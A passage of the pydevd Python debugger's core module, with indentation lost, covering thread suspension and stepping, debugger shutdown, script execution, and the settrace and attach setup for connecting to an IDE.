self.writer.add_command(self.cmd_factory.make_custom_frame_created_message(
frame_custom_thread_id, custom_frame.name))
self.writer.add_command(
frames_tracker.create_thread_suspend_command(frame_custom_thread_id, CMD_THREAD_SUSPEND, "", suspend_type))
from_this_thread.append(frame_custom_thread_id)
with self._threads_suspended_single_notification.notify_thread_suspended(thread_id, stop_reason):
keep_suspended = self._do_wait_suspend(thread, frame, event, arg, suspend_type, from_this_thread, frames_tracker)
frames_list = None
if keep_suspended:
# This means that we should pause again after a set next statement.
self._threads_suspended_single_notification.increment_suspend_time()
self.do_wait_suspend(thread, frame, event, arg, exception_type)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
pydev_log.debug('Leaving PyDB.do_wait_suspend: %s (%s) %s', thread, thread_id, id(thread))
def _do_wait_suspend(self, thread, frame, event, arg, suspend_type, from_this_thread, frames_tracker):
info = thread.additional_info
info.step_in_initial_location = None
keep_suspended = False
with self._main_lock: # Use lock to check if suspended state changed
activate_matplotlib = info.pydev_state == STATE_SUSPEND and not self.pydb_disposed
in_main_thread = is_current_thread_main_thread()
if activate_matplotlib and in_main_thread:
# before every stop check if matplotlib modules were imported inside script code
self._activate_mpl_if_needed()
while True:
with self._main_lock: # Use lock to check if suspended state changed
if info.pydev_state != STATE_SUSPEND or (self.pydb_disposed and not self.terminate_requested):
# Note: we can't exit here if terminate was requested while a breakpoint was hit.
break
if in_main_thread and self.mpl_in_use:
# call input hooks if only matplotlib is in use
self._call_mpl_hook()
self.process_internal_commands()
time.sleep(0.01)
self.cancel_async_evaluation(get_current_thread_id(thread), str(id(frame)))
# process any stepping instructions
if info.pydev_step_cmd in (CMD_STEP_INTO, CMD_STEP_INTO_MY_CODE):
info.step_in_initial_location = (frame, frame.f_lineno)
if frame.f_code.co_flags & 0x80: # CO_COROUTINE = 0x80
# When in a coroutine we switch to CMD_STEP_INTO_COROUTINE.
info.pydev_step_cmd = CMD_STEP_INTO_COROUTINE
info.pydev_step_stop = frame
info.pydev_smart_step_stop = None
self.set_trace_for_frame_and_parents(frame)
else:
info.pydev_step_stop = None
info.pydev_smart_step_stop = None
self.set_trace_for_frame_and_parents(frame)
elif info.pydev_step_cmd in (CMD_STEP_OVER, CMD_STEP_OVER_MY_CODE):
info.pydev_step_stop = frame
info.pydev_smart_step_stop = None
self.set_trace_for_frame_and_parents(frame)
elif info.pydev_step_cmd == CMD_SMART_STEP_INTO:
info.pydev_step_stop = None
info.pydev_smart_step_stop = frame
self.set_trace_for_frame_and_parents(frame)
elif info.pydev_step_cmd == CMD_RUN_TO_LINE or info.pydev_step_cmd == CMD_SET_NEXT_STATEMENT:
info.pydev_step_stop = None
self.set_trace_for_frame_and_parents(frame)
stop = False
response_msg = ""
try:
stop, _old_line, response_msg = self.set_next_statement(frame, event, info.pydev_func_name, info.pydev_next_line)
except ValueError as e:
response_msg = "%s" % e
finally:
seq = info.pydev_message
cmd = self.cmd_factory.make_set_next_stmnt_status_message(seq, stop, response_msg)
self.writer.add_command(cmd)
info.pydev_message = ''
if stop:
# Uninstall the current frames tracker before running it.
frames_tracker.untrack_all()
cmd = self.cmd_factory.make_thread_run_message(get_current_thread_id(thread), info.pydev_step_cmd)
self.writer.add_command(cmd)
info.pydev_state = STATE_SUSPEND
thread.stop_reason = CMD_SET_NEXT_STATEMENT
keep_suspended = True
else:
# Set next did not work...
info.pydev_original_step_cmd = -1
info.pydev_step_cmd = -1
info.pydev_state = STATE_SUSPEND
thread.stop_reason = CMD_THREAD_SUSPEND
# return to the suspend state and wait for other command (without sending any
# additional notification to the client).
return self._do_wait_suspend(thread, frame, event, arg, suspend_type, from_this_thread, frames_tracker)
elif info.pydev_step_cmd in (CMD_STEP_RETURN, CMD_STEP_RETURN_MY_CODE):
back_frame = frame.f_back
force_check_project_scope = info.pydev_step_cmd == CMD_STEP_RETURN_MY_CODE
if force_check_project_scope or self.is_files_filter_enabled:
while back_frame is not None:
if self.apply_files_filter(back_frame, back_frame.f_code.co_filename, force_check_project_scope):
frame = back_frame
back_frame = back_frame.f_back
else:
break
if back_frame is not None:
# steps back to the same frame (in a return call it will stop in the 'back frame' for the user)
info.pydev_step_stop = frame
self.set_trace_for_frame_and_parents(frame)
else:
# No back frame?!? -- this happens in jython when we have some frame created from an awt event
# (the previous frame would be the awt event, but this doesn't make part of 'jython', only 'java')
# so, if we're doing a step return in this situation, it's the same as just making it run
info.pydev_step_stop = None
info.pydev_original_step_cmd = -1
info.pydev_step_cmd = -1
info.pydev_state = STATE_RUN
del frame
cmd = self.cmd_factory.make_thread_run_message(get_current_thread_id(thread), info.pydev_step_cmd)
self.writer.add_command(cmd)
with CustomFramesContainer.custom_frames_lock:
# The ones that remained on last_running must now be removed.
for frame_id in from_this_thread:
# print('Removing created frame: %s' % (frame_id,))
self.writer.add_command(self.cmd_factory.make_thread_killed_message(frame_id))
return keep_suspended
def do_stop_on_unhandled_exception(self, thread, frame, frames_byid, arg):
pydev_log.debug("We are stopping in unhandled exception.")
try:
add_exception_to_frame(frame, arg)
self.set_suspend(thread, CMD_ADD_EXCEPTION_BREAK)
self.do_wait_suspend(thread, frame, 'exception', arg, EXCEPTION_TYPE_UNHANDLED)
except:
pydev_log.exception("We've got an error while stopping in unhandled exception: %s.", arg[0])
finally:
remove_exception_from_frame(frame)
frame = None
def set_trace_for_frame_and_parents(self, frame, **kwargs):
disable = kwargs.pop('disable', False)
assert not kwargs
while frame is not None:
# Don't change the tracing on debugger-related files
file_type = self.get_file_type(frame)
if file_type is None:
if disable:
pydev_log.debug('Disable tracing of frame: %s - %s', frame.f_code.co_filename, frame.f_code.co_name)
if frame.f_trace is not None and frame.f_trace is not NO_FTRACE:
frame.f_trace = NO_FTRACE
elif frame.f_trace is not self.trace_dispatch:
pydev_log.debug('Set tracing of frame: %s - %s', frame.f_code.co_filename, frame.f_code.co_name)
frame.f_trace = self.trace_dispatch
else:
pydev_log.debug('SKIP set tracing of frame: %s - %s', frame.f_code.co_filename, frame.f_code.co_name)
frame = frame.f_back
del frame
def _create_pydb_command_thread(self):
curr_pydb_command_thread = self.py_db_command_thread
if curr_pydb_command_thread is not None:
curr_pydb_command_thread.do_kill_pydev_thread()
new_pydb_command_thread = self.py_db_command_thread = PyDBCommandThread(self)
new_pydb_command_thread.start()
def _create_check_output_thread(self):
curr_output_checker_thread = self.check_alive_thread
if curr_output_checker_thread is not None:
curr_output_checker_thread.do_kill_pydev_thread()
check_alive_thread = self.check_alive_thread = CheckAliveThread(self)
check_alive_thread.start()
def start_auxiliary_daemon_threads(self):
self._create_pydb_command_thread()
self._create_check_output_thread()
def __wait_for_threads_to_finish(self, timeout):
try:
with self._wait_for_threads_to_finish_called_lock:
wait_for_threads_to_finish_called = self._wait_for_threads_to_finish_called
self._wait_for_threads_to_finish_called = True
if wait_for_threads_to_finish_called:
# Make sure that we wait for the previous call to be finished.
self._wait_for_threads_to_finish_called_event.wait(timeout=timeout)
else:
try:
def get_pydb_daemon_threads_to_wait():
pydb_daemon_threads = set(dict_keys(self.created_pydb_daemon_threads))
pydb_daemon_threads.discard(self.check_alive_thread)
pydb_daemon_threads.discard(threading.current_thread())
return pydb_daemon_threads
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads waiting for pydb daemon threads to finish")
started_at = time.time()
# Note: we wait for all except the check_alive_thread (which is not really a daemon
# thread and it can call this method itself).
while time.time() < started_at + timeout:
if len(get_pydb_daemon_threads_to_wait()) == 0:
break
time.sleep(1 / 10.)
else:
thread_names = [t.getName() for t in get_pydb_daemon_threads_to_wait()]
if thread_names:
pydev_log.debug("The following pydb threads may not have finished correctly: %s",
', '.join(thread_names))
finally:
self._wait_for_threads_to_finish_called_event.set()
except:
pydev_log.exception()
def dispose_and_kill_all_pydevd_threads(self, wait=True, timeout=.5):
'''
When this method is called we finish the debug session, terminate threads
and if this was registered as the global instance, unregister it -- afterwards
it should be possible to create a new instance and set as global to start
a new debug session.
:param bool wait:
If True we'll wait for the threads to be actually finished before proceeding
(based on the available timeout).
Note that this must be thread-safe and if one thread is waiting the other thread should
also wait.
'''
try:
back_frame = sys._getframe().f_back
pydev_log.debug(
'PyDB.dispose_and_kill_all_pydevd_threads (called from: File "%s", line %s, in %s)',
back_frame.f_code.co_filename, back_frame.f_lineno, back_frame.f_code.co_name
)
back_frame = None
with self._disposed_lock:
disposed = self.pydb_disposed
self.pydb_disposed = True
if disposed:
if wait:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads (already disposed - wait)")
self.__wait_for_threads_to_finish(timeout)
else:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads (already disposed - no wait)")
return
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads (first call)")
# Wait until a time when there are no commands being processed to kill the threads.
started_at = time.time()
while time.time() < started_at + timeout:
with self._main_lock:
writer = self.writer
if writer is None or writer.empty():
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads no commands being processed.")
break
else:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads timed out waiting for writer to be empty.")
pydb_daemon_threads = set(dict_keys(self.created_pydb_daemon_threads))
for t in pydb_daemon_threads:
if hasattr(t, 'do_kill_pydev_thread'):
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads killing thread: %s", t)
t.do_kill_pydev_thread()
if wait:
self.__wait_for_threads_to_finish(timeout)
else:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads: no wait")
py_db = get_global_debugger()
if py_db is self:
set_global_debugger(None)
except:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads: exception")
try:
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 3:
pydev_log.exception()
except:
pass
finally:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads: finished")
def prepare_to_run(self):
''' Shared code to prepare debugging by installing traces and registering threads '''
self.patch_threads()
self.start_auxiliary_daemon_threads()
def patch_threads(self):
try:
# not available in jython!
threading.settrace(self.trace_dispatch) # for all future threads
except:
pass
from _pydev_bundle.pydev_monkey import patch_thread_modules
patch_thread_modules()
def run(self, file, globals=None, locals=None, is_module=False, set_trace=True):
module_name = None
entry_point_fn = ''
if is_module:
# When launching with `python -m <module>`, python automatically adds
# an empty path to the PYTHONPATH which resolves files in the current
# directory, so, depending how pydevd itself is launched, we may need
# to manually add such an entry to properly resolve modules in the
# current directory (see: https://github.com/Microsoft/ptvsd/issues/1010).
if '' not in sys.path:
sys.path.insert(0, '')
file, _, entry_point_fn = file.partition(':')
module_name = file
filename = get_fullname(file)
if filename is None:
mod_dir = get_package_dir(module_name)
if mod_dir is None:
sys.stderr.write("No module named %s\n" % file)
return
else:
filename = get_fullname("%s.__main__" % module_name)
if filename is None:
sys.stderr.write("No module named %s\n" % file)
return
else:
file = filename
else:
file = filename
mod_dir = os.path.dirname(filename)
main_py = os.path.join(mod_dir, '__main__.py')
main_pyc = os.path.join(mod_dir, '__main__.pyc')
if filename.endswith('__init__.pyc'):
if os.path.exists(main_pyc):
filename = main_pyc
elif os.path.exists(main_py):
filename = main_py
elif filename.endswith('__init__.py'):
if os.path.exists(main_pyc) and not os.path.exists(main_py):
filename = main_pyc
elif os.path.exists(main_py):
filename = main_py
sys.argv[0] = filename
if os.path.isdir(file):
new_target = os.path.join(file, '__main__.py')
if os.path.isfile(new_target):
file = new_target
m = None
if globals is None:
m = save_main_module(file, 'pydevd')
globals = m.__dict__
try:
globals['__builtins__'] = __builtins__
except NameError:
pass # Not there on Jython...
if locals is None:
locals = globals
# Predefined (writable) attributes: __name__ is the module's name;
# __doc__ is the module's documentation string, or None if unavailable;
# __file__ is the pathname of the file from which the module was loaded,
# if it was loaded from a file. The __file__ attribute is not present for
# C modules that are statically linked into the interpreter; for extension modules
# loaded dynamically from a shared library, it is the pathname of the shared library file.
# I think this is an ugly hack, bug it works (seems to) for the bug that says that sys.path should be the same in
# debug and run.
if sys.path[0] != '' and m is not None and m.__file__.startswith(sys.path[0]):
# print >> sys.stderr, 'Deleting: ', sys.path[0]
del sys.path[0]
if not is_module:
# now, the local directory has to be added to the pythonpath
# sys.path.insert(0, os.getcwd())
# Changed: it's not the local directory, but the directory of the file launched
# The file being run must be in the pythonpath (even if it was not before)
sys.path.insert(0, os.path.split(os_path_abspath(file))[0])
if set_trace:
self.wait_for_ready_to_run()
# call prepare_to_run when we already have all information about breakpoints
self.prepare_to_run()
t = threadingCurrentThread()
thread_id = get_current_thread_id(t)
if self.thread_analyser is not None:
wrap_threads()
self.thread_analyser.set_start_time(cur_time())
send_concurrency_message("threading_event", 0, t.getName(), thread_id, "thread", "start", file, 1, None, parent=thread_id)
if self.asyncio_analyser is not None:
# we don't have main thread in asyncio graph, so we should add a fake event
send_concurrency_message("asyncio_event", 0, "Task", "Task", "thread", "stop", file, 1, frame=None, parent=None)
try:
if INTERACTIVE_MODE_AVAILABLE:
self.init_matplotlib_support()
except:
sys.stderr.write("Matplotlib support in debugger failed\n")
pydev_log.exception()
if hasattr(sys, 'exc_clear'):
# we should clean exception information in Python 2, before user's code execution
sys.exc_clear()
# Notify that the main thread is created.
self.notify_thread_created(thread_id, t)
# Note: important: set the tracing right before calling _exec.
if set_trace:
self.enable_tracing()
return self._exec(is_module, entry_point_fn, module_name, file, globals, locals)
def _exec(self, is_module, entry_point_fn, module_name, file, globals, locals):
'''
This function should have frames tracked by unhandled exceptions (the `_exec` name is important).
'''
if not is_module:
pydev_imports.execfile(file, globals, locals) # execute the script
else:
# treat ':' as a separator between module and entry point function
# if there is no entry point we run we same as with -m switch. Otherwise we perform
# an import and execute the entry point
if entry_point_fn:
mod = __import__(module_name, level=0, fromlist=[entry_point_fn], globals=globals, locals=locals)
func = getattr(mod, entry_point_fn)
func()
else:
# Run with the -m switch
import runpy
if hasattr(runpy, '_run_module_as_main'):
# Newer versions of Python actually use this when the -m switch is used.
if sys.version_info[:2] <= (2, 6):
runpy._run_module_as_main(module_name, set_argv0=False)
else:
runpy._run_module_as_main(module_name, alter_argv=False)
else:
runpy.run_module(module_name)
return globals
def wait_for_commands(self, globals):
self._activate_mpl_if_needed()
thread = threading.currentThread()
from _pydevd_bundle import pydevd_frame_utils
frame = pydevd_frame_utils.Frame(None, -1, pydevd_frame_utils.FCode("Console",
os.path.abspath(os.path.dirname(__file__))), globals, globals)
thread_id = get_current_thread_id(thread)
self.add_fake_frame(thread_id, id(frame), frame)
cmd = self.cmd_factory.make_show_console_message(self, thread_id, frame)
if self.writer is not None:
self.writer.add_command(cmd)
while True:
if self.mpl_in_use:
# call input hooks if only matplotlib is in use
self._call_mpl_hook()
self.process_internal_commands()
time.sleep(0.01)
class IDAPMessagesListener(object):
def before_send(self, message_as_dict):
'''
Called just before a message is sent to the IDE.
:type message_as_dict: dict
'''
def after_receive(self, message_as_dict):
'''
Called just after a message is received from the IDE.
:type message_as_dict: dict
'''
def add_dap_messages_listener(dap_messages_listener):
'''
Adds a listener for the DAP (debug adapter protocol) messages.
:type dap_messages_listener: IDAPMessagesListener
:note: messages from the xml backend are not notified through this API.
:note: the notifications are sent from threads and they are not synchronized (so,
it's possible that a message is sent and received from different threads at the same time).
'''
py_db = get_global_debugger()
if py_db is None:
raise AssertionError('PyDB is still not setup.')
py_db.add_dap_messages_listener(dap_messages_listener)
def send_json_message(msg):
'''
API to send some custom json message.
:param dict|pydevd_schema.BaseSchema msg:
The custom message to be sent.
:return bool:
True if the message was added to the queue to be sent and False otherwise.
'''
py_db = get_global_debugger()
if py_db is None:
return False
writer = py_db.writer
if writer is None:
return False
cmd = NetCommand(-1, 0, msg, is_json=True)
writer.add_command(cmd)
return True
def set_debug(setup):
setup['DEBUG_RECORD_SOCKET_READS'] = True
setup['DEBUG_TRACE_BREAKPOINTS'] = 1
setup['DEBUG_TRACE_LEVEL'] = 3
def enable_qt_support(qt_support_mode):
from _pydev_bundle import pydev_monkey_qt
pydev_monkey_qt.patch_qt(qt_support_mode)
def start_dump_threads_thread(filename_template, timeout, recurrent):
'''
Helper to dump threads after a timeout.
:param filename_template:
A template filename, such as 'c:/temp/thread_dump_%s.txt', where the %s will
be replaced by the time for the dump.
:param timeout:
The timeout (in seconds) for the dump.
:param recurrent:
If True we'll keep on doing thread dumps.
'''
assert filename_template.count('%s') == 1, \
'Expected one %%s to appear in: %s' % (filename_template,)
def _threads_on_timeout():
try:
while True:
time.sleep(timeout)
filename = filename_template % (time.time(),)
try:
os.makedirs(os.path.dirname(filename))
except Exception:
pass
with open(filename, 'w') as stream:
dump_threads(stream)
if not recurrent:
return
except Exception:
pydev_log.exception()
t = threading.Thread(target=_threads_on_timeout)
mark_as_pydevd_daemon_thread(t)
t.start()
def dump_threads(stream=None):
'''
Helper to dump thread info (default is printing to stderr).
'''
pydevd_utils.dump_threads(stream)
def usage(doExit=0):
sys.stdout.write('Usage:\n')
sys.stdout.write('pydevd.py --port N [(--client hostname) | --server] --file executable [file_options]\n')
if doExit:
sys.exit(0)
def _init_stdout_redirect():
pydevd_io.redirect_stream_to_pydb_io_messages(std='stdout')
def _init_stderr_redirect():
pydevd_io.redirect_stream_to_pydb_io_messages(std='stderr')
def _enable_attach(
address,
dont_trace_start_patterns=(),
dont_trace_end_patterns=(),
patch_multiprocessing=False,
access_token=None,
client_access_token=None,
):
'''
Starts accepting connections at the given host/port. The debugger will not be initialized nor
configured, it'll only start accepting connections (and will have the tracing setup in this
thread).
Meant to be used with the DAP (Debug Adapter Protocol) with _wait_for_attach().
:param address: (host, port)
:type address: tuple(str, int)
'''
host = address[0]
port = int(address[1])
if SetupHolder.setup is not None:
if port != SetupHolder.setup['port']:
raise AssertionError('Unable to listen in port: %s (already listening in port: %s)' % (port, SetupHolder.setup['port']))
settrace(
host=host,
port=port,
suspend=False,
wait_for_ready_to_run=False,
block_until_connected=False,
dont_trace_start_patterns=dont_trace_start_patterns,
dont_trace_end_patterns=dont_trace_end_patterns,
patch_multiprocessing=patch_multiprocessing,
access_token=access_token,
client_access_token=client_access_token,
)
py_db = get_global_debugger()
py_db.wait_for_server_socket_ready()
return py_db._server_socket_name
def _wait_for_attach(cancel=None):
'''
Meant to be called after _enable_attach() -- the current thread will only unblock after a
connection is in place and the DAP (Debug Adapter Protocol) sends the ConfigurationDone
request.
'''
py_db = get_global_debugger()
if py_db is None:
raise AssertionError('Debugger still not created. Please use _enable_attach() before using _wait_for_attach().')
py_db.block_until_configuration_done(cancel=cancel)
def _is_attached():
'''
Can be called any time to check if the connection was established and the DAP (Debug Adapter Protocol) has sent
the ConfigurationDone request.
'''
py_db = get_global_debugger()
return (py_db is not None) and py_db.is_attached()
#=======================================================================================================================
# settrace
#=======================================================================================================================
def settrace(
host=None,
stdout_to_server=False,
stderr_to_server=False,
port=5678,
suspend=True,
trace_only_current_thread=False,
overwrite_prev_trace=False,
patch_multiprocessing=False,
stop_at_frame=None,
block_until_connected=True,
wait_for_ready_to_run=True,
dont_trace_start_patterns=(),
dont_trace_end_patterns=(),
access_token=None,
client_access_token=None,
notify_stdin=True,
**kwargs
):
'''Sets the tracing function with the pydev debug function and initializes needed facilities.
:param host: the user may specify another host, if the debug server is not in the same machine (default is the local
host)
:param stdout_to_server: when this is true, the stdout is passed to the debug server
:param stderr_to_server: when this is true, the stderr is passed to the debug server
so that they are printed in its console and not in this process console.
:param port: specifies which port to use for communicating with the server (note that the server must be started
in the same port). @note: currently it's hard-coded at 5678 in the client
:param suspend: whether a breakpoint should be emulated as soon as this function is called.
:param trace_only_current_thread: determines if only the current thread will be traced or all current and future
threads will also have the tracing enabled.
:param overwrite_prev_trace: deprecated
:param patch_multiprocessing: if True we'll patch the functions which create new processes so that launched
processes are debugged.
:param stop_at_frame: if passed it'll stop at the given frame, otherwise it'll stop in the function which
called this method.
:param wait_for_ready_to_run: if True settrace will block until the ready_to_run flag is set to True,
otherwise, it'll set ready_to_run to True and this function won't block.
Note that if wait_for_ready_to_run == False, there are no guarantees that the debugger is synchronized
with what's configured in the client (IDE), the only guarantee is that when leaving this function
the debugger will be already connected.
:param dont_trace_start_patterns: if set, then any path that starts with one fo the patterns in the collection
will not be traced
:param dont_trace_end_patterns: if set, then any path that ends with one fo the patterns in the collection
will not be traced
:param access_token: token to be sent from the client (i.e.: IDE) to the debugger when a connection
is established (verified by the debugger).
:param client_access_token: token to be sent from the debugger to the client (i.e.: IDE) when
a connection is established (verified by the client).
:param notify_stdin:
If True sys.stdin will be patched to notify the client when a message is requested
from the IDE. This is done so that when reading the stdin the client is notified.
Clients may need this to know when something that is being written should be interpreted
as an input to the process or as a command to be evaluated.
Note that parallel-python has issues with this (because it tries to assert that sys.stdin
is of a given type instead of just checking that it has what it needs).
'''
stdout_to_server = stdout_to_server or kwargs.get('stdoutToServer', False) # Backward compatibility
stderr_to_server = stderr_to_server or kwargs.get('stderrToServer', False) # Backward compatibility
# Internal use (may be used to set the setup info directly for subprocesess).
__setup_holder__ = kwargs.get('__setup_holder__')
with _set_trace_lock:
_locked_settrace(
host,
stdout_to_server,
stderr_to_server,
port,
suspend,
trace_only_current_thread,
patch_multiprocessing,
stop_at_frame,
block_until_connected,
wait_for_ready_to_run,
dont_trace_start_patterns,
dont_trace_end_patterns,
access_token,
client_access_token,
__setup_holder__=__setup_holder__,
notify_stdin=notify_stdin,
)
_set_trace_lock = ForkSafeLock()
def _locked_settrace(
host,
stdout_to_server,
stderr_to_server,
port,
suspend,
trace_only_current_thread,
patch_multiprocessing,
stop_at_frame,
block_until_connected,
wait_for_ready_to_run,
dont_trace_start_patterns,
dont_trace_end_patterns,
access_token,
client_access_token,
__setup_holder__,
notify_stdin,
):
if patch_multiprocessing:
try:
from _pydev_bundle import pydev_monkey
except:
pass
else:
pydev_monkey.patch_new_process_functions()
if host is None:
from _pydev_bundle import pydev_localhost
host = pydev_localhost.get_localhost()
global _global_redirect_stdout_to_server
global _global_redirect_stderr_to_server
py_db = get_global_debugger()
if __setup_holder__:
SetupHolder.setup = __setup_holder__
if py_db is None:
py_db = PyDB()
pydevd_vm_type.setup_type()
if SetupHolder.setup is None:
setup = {
'client': host, # dispatch expects client to be set to the host address when server is False
'server': False,
'port': int(port),
'multiprocess': patch_multiprocessing,
'skip-notify-stdin': not notify_stdin,
}
SetupHolder.setup = setup
if access_token is not None:
py_db.authentication.access_token = access_token
SetupHolder.setup['access-token'] = access_token
if client_access_token is not None:
py_db.authentication.client_access_token = client_access_token
SetupHolder.setup['client-access-token'] = client_access_token
if block_until_connected:
py_db.connect(host, port) # Note: connect can raise error.
else:
# Create a dummy writer and wait for the real connection.
py_db.writer = WriterThread(NULL, py_db, terminate_on_socket_close=False)
py_db.create_wait_for_connection_thread()
if dont_trace_start_patterns or dont_trace_end_patterns:
PyDevdAPI().set_dont_trace_start_end_patterns(py_db, dont_trace_start_patterns, dont_trace_end_patterns)
_global_redirect_stdout_to_server = stdout_to_server
_global_redirect_stderr_to_server = stderr_to_server
if _global_redirect_stdout_to_server:
_init_stdout_redirect()
if _global_redirect_stderr_to_server:
_init_stderr_redirect()
if notify_stdin:
patch_stdin()
t = threadingCurrentThread()
additional_info = set_additional_thread_info(t)
if not wait_for_ready_to_run:
py_db.ready_to_run = True
py_db.wait_for_ready_to_run()
py_db.start_auxiliary_daemon_threads()
if trace_only_current_thread:
py_db.enable_tracing()
else:
# Trace future threads.
py_db.patch_threads()
py_db.enable_tracing(py_db.trace_dispatch, apply_to_all_threads=True)
# As this is the first connection, also set tracing for any untraced threads
py_db.set_tracing_for_untraced_contexts()
py_db.set_trace_for_frame_and_parents(get_frame().f_back)
with CustomFramesContainer.custom_frames_lock: # @UndefinedVariable
for _frameId, custom_frame in dict_iter_items(CustomFramesContainer.custom_frames):
py_db.set_trace_for_frame_and_parents(custom_frame.frame)
else:
# ok, we're already in debug mode, with all set, so, let's just set the break
if access_token is not None:
py_db.authentication.access_token = access_token
if client_access_token is not None:
py_db.authentication.client_access_token = client_access_token
py_db.set_trace_for_frame_and_parents(get_frame().f_back)
t = threadingCurrentThread()
additional_info = set_additional_thread_info(t)
if trace_only_current_thread:
py_db.enable_tracing()
else:
# Trace future threads.
py_db.patch_threads()
py_db.enable_tracing(py_db.trace_dispatch, apply_to_all_threads=True)
# Suspend as the last thing after all tracing is in place.
if suspend:
if stop_at_frame is not None:
# If the step was set we have to go to run state and
# set the proper frame for it to stop.
additional_info.pydev_state = STATE_RUN
additional_info.pydev_original_step_cmd = CMD_STEP_OVER
additional_info.pydev_step_cmd = CMD_STEP_OVER
additional_info.pydev_step_stop = stop_at_frame
additional_info.suspend_type = PYTHON_SUSPEND
else:
# Ask to break as soon as possible.
py_db.set_suspend(t, CMD_SET_BREAK)
def stoptrace():
pydev_log.debug("pydevd.stoptrace()")
pydevd_tracing.restore_sys_set_trace_func()
sys.settrace(None)
try:
# not available in jython!
threading.settrace(None) # for all future threads
except:
pass
from _pydev_bundle.pydev_monkey import undo_patch_thread_modules
undo_patch_thread_modules()
# Either or both standard streams can be closed at this point,
# in which case flush() will fail.
try:
sys.stdout.flush()
except:
pass
try:
sys.stderr.flush()
except:
pass
py_db = get_global_debugger()
if py_db is not None:
py_db.dispose_and_kill_all_pydevd_threads()
class Dispatcher(object):
def __init__(self):
self.port = None
def connect(self, host, port):
self.host = host
self.port = port
self.client = start_client(self.host, self.port)
self.reader = DispatchReader(self)
self.reader.pydev_do_not_trace = False # we run reader in the same thread so we don't want to loose tracing
self.reader.run()
def close(self):
try:
self.reader.do_kill_pydev_thread()
except:
pass
class DispatchReader(ReaderThread):
def __init__(self, dispatcher):
self.dispatcher = dispatcher
ReaderThread.__init__(
self,
get_global_debugger(),
self.dispatcher.client,
PyDevJsonCommandProcessor=PyDevJsonCommandProcessor,
process_net_command=process_net_command,
)
@overrides(ReaderThread._on_run)
def _on_run(self):
dummy_thread = threading.currentThread()
dummy_thread.is_pydev_daemon_thread = False
return ReaderThread._on_run(self)
@overrides(PyDBDaemonThread.do_kill_pydev_thread)
def do_kill_pydev_thread(self):
if not self._kill_received:
ReaderThread.do_kill_pydev_thread(self)
try:
self.sock.shutdown(SHUT_RDWR)
except:
pass
try:
self.sock.close()
except:
pass
def process_command(self, cmd_id, seq, text):
if cmd_id == 99:
self.dispatcher.port = int(text)
self._kill_received = True
DISPATCH_APPROACH_NEW_CONNECTION = 1 # Used by PyDev
DISPATCH_APPROACH_EXISTING_CONNECTION = 2 # Used by PyCharm
DISPATCH_APPROACH = DISPATCH_APPROACH_NEW_CONNECTION
def dispatch():
setup = SetupHolder.setup
host = setup['client']
port = setup['port']
if DISPATCH_APPROACH == DISPATCH_APPROACH_EXISTING_CONNECTION:
dispatcher = Dispatcher()
try:
dispatcher.connect(host, port)
port = dispatcher.port
finally:
dispatcher.close()
return host, port
def settrace_forked(setup_tracing=True):
'''
When creating a fork from a process in the debugger, we need to reset the whole debugger environment!
'''
from _pydevd_bundle.pydevd_constants import GlobalDebuggerHolder
py_db = GlobalDebuggerHolder.global_dbg
if py_db is not None:
py_db.created_pydb_daemon_threads = {} # Just making sure we won't touch those (paused) threads.
py_db = None
GlobalDebuggerHolder.global_dbg = None
threading.current_thread().additional_info = None
# Make sure that we keep the same access tokens for subprocesses started through fork.
setup = SetupHolder.setup
if setup is None:
setup = {}
else:
# i.e.: Get the ppid at this point as it just changed.
# If we later do an exec() it should remain the same ppid.
setup[pydevd_constants.ARGUMENT_PPID] = PyDevdAPI().get_ppid()
access_token = setup.get('access-token')
client_access_token = setup.get('client-access-token')
if setup_tracing:
from _pydevd_frame_eval.pydevd_frame_eval_main import clear_thread_local_info
host, port = dispatch()
import pydevd_tracing
pydevd_tracing.restore_sys_set_trace_func()
if setup_tracing:
if port is not None:
custom_frames_container_init()
if clear_thread_local_info is not None:
clear_thread_local_info()
settrace(
host,
port=port,
suspend=False,
trace_only_current_thread=False,
overwrite_prev_trace=True,
patch_multiprocessing=True,
access_token=access_token,
client_access_token=client_access_token,
)
@contextmanager
def skip_subprocess_arg_patch():
'''
May be used to skip the monkey-patching that pydevd does to
skip changing arguments to embed the debugger into child processes.
i.e.:
with pydevd.skip_subprocess_arg_patch():
subprocess.call(...)
'''
from _pydev_bundle import pydev_monkey
with pydev_monkey.skip_subprocess_arg_patch():
yield
def add_dont_terminate_child_pid(pid):
'''
May be used to ask pydevd to skip the termination of some process
when it's asked to terminate (debug adapter protocol only).
:param int pid:
The pid to be ignored.
i.e.:
process = subprocess.Popen(...)
pydevd.add_dont_terminate_child_pid(process.pid)
'''
py_db = get_global_debugger()
if py_db is not None:
py_db.dont_terminate_child_pids.add(pid)
class SetupHolder:
setup = None
def apply_debugger_options(setup_options):
"""
:type setup_options: dict[str, bool]
"""
default_options = {'save-signatures': False, 'qt-support': ''}
default_options.update(setup_options)
setup_options = default_options
debugger = get_global_debugger()
if setup_options['save-signatures']:
if pydevd_vm_type.get_vm_type() == pydevd_vm_type.PydevdVmType.JYTHON:
sys.stderr.write("Collecting run-time type information is not supported for Jython\n")
else:
# Only import it if we're going to use it!
from _pydevd_bundle.pydevd_signature import SignatureFactory
debugger.signature_factory = SignatureFactory()
if setup_options['qt-support']:
enable_qt_support(setup_options['qt-support'])
@call_only_once
def patch_stdin():
_internal_patch_stdin(None, sys, getpass_mod)
def _internal_patch_stdin(py_db=None, sys=None, getpass_mod=None):
'''
Note: don't use this function directly, use `patch_stdin()` instead.
(this function is only meant to be used on test-cases to avoid patching the actual globals).
'''
# Patch stdin so that we notify when readline() is called.
original_sys_stdin = sys.stdin
debug_console_stdin = DebugConsoleStdIn(py_db, original_sys_stdin)
sys.stdin = debug_console_stdin
_original_getpass = getpass_mod.getpass
@functools.wraps(_original_getpass)
def getpass(*args, **kwargs):
with DebugConsoleStdIn.notify_input_requested(debug_console_stdin):
try:
curr_stdin = sys.stdin
